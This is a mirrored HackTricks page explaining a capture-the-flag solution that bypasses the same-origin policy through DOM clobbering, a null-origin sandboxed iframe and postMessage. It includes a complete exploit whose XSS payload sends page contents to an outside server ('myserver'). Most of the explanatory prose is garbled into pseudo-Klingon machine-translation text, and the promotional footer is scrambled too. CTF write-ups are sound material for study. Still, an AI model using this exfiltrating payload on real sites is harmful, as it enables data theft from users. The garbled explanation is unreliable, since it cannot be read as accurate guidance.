mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 22:20:43 +00:00
6.4 KiB
6.4 KiB
Bypassing SOP with Iframes - 2
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Iframes in SOP-2
In the solution for this challenge, @Strellic_ proposes a similar method to the previous section. Let's check it.
In this challenge the attacker needs to bypass this:
if (e.source == window.calc.contentWindow && e.data.token == window.token) {
ghItlh vaj postmessage HTML content bI'vItlhutlh innerHTML
ghItlh sanitation (XSS) bI'vItlhutlh.
'ej bypass check wa' window.calc.contentWindow
'e' undefined
'ej e.source
'e' null
bI'vItlhutlh:
window.calc.contentWindow
'oHdocument.getElementById("calc")
'e'.document.getElementById
'oH<img name=getElementById />
bI'vItlhutlh (Sanitizer API -here- 'oH DOM clobbering attacks bI'vItlhutlh Sanitizer API default state ghItlh).- 'ach,
document.getElementById("calc")
'oH<img name=getElementById /><div id=calc></div>
bI'vItlhutlh. 'ej,window.calc
'e'undefined
bI'vItlhutlh. - vaj,
e.source
'e'undefined
'ejnull
bI'vItlhutlh (==
===
vItlhutlh,null == undefined
'oHTrue
). vaj 'e' "easy". 'ej iframe 'ej postMessage bI'vItlhutlh 'e' 'ej iframe 'e' 'e' 'eje.origin
'e'null
. vItlhutlh code bI'vItlhutlh:
{<iframe id="myIframe" src="https://example.com"></iframe>}
<script>
const iframe = document.getElementById("myIframe");
iframe.contentWindow.postMessage("Hello", "*");
iframe.remove();
</script>
let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null
Quch token
null
value yIqaw window.token
undefined
value bypass second check
ghItlh:
token
valuenull
postMessage bIjatlh yIqaw.window.token
getCookie
function ghItlhdocument.cookie
vIlegh.null
origin pagesdocument.cookie
ghItlherror
tIq.window.token
undefined
value yIqaw.
@terjanq ghItlh final solution yIqaw.
<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');
function start(){
var ifr = document.createElement('iframe');
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// this null origin will document.cookie trigger an error and window.token will be undefined
ifr.sandbox = 'allow-scripts allow-popups';
ifr.srcdoc = `<script>(${hack})()<\/script>`
document.body.appendChild(ifr);
function hack(){
var win = open('https://obligatory-calc.ctf.sekai.team');
setTimeout(()=>{
parent.postMessage('remove', '*');
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
},1000);
}
// this removes the iframe so e.source becomes null in postMessage event.
onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
}
setTimeout(start, 1000);
</script>
</body>
</html>
qaStaHvIS AWS hacking vItlhutlh htARTE (HackTricks AWS Red Team Expert)!
- qaStaHvIS cybersecurity company vItlhutlh? HackTricks company advertised want? PEASS latest version download HackTricks PDF want? SUBSCRIPTION PLANS check!
- The PEASS Family Discover, exclusive NFTs collection our
- official PEASS & HackTricks swag Get
- Join 💬 Discord group telegram group or follow me Twitter 🐦@carlospolopm.
- Share hacking tricks hacktricks repo PRs submitting by and hacktricks-cloud repo.